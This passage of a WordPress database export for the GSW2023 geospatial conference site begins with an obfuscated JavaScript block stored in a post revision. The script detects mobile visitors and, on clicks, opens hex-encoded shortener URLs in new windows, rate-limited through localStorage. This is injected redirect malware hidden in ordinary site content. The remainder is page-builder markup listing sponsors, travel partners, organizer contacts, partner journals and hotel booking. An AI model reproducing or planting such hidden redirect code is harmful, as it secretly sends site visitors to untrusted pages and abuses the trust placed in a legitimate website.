_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 16:29:54','2023-08-13 16:29:54','',3066,'https://gsw2023.com/?p=5129',0,'revision','',0),
(5130,1,'2023-08-13 16:30:43','2023-08-13 16:30:43','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text 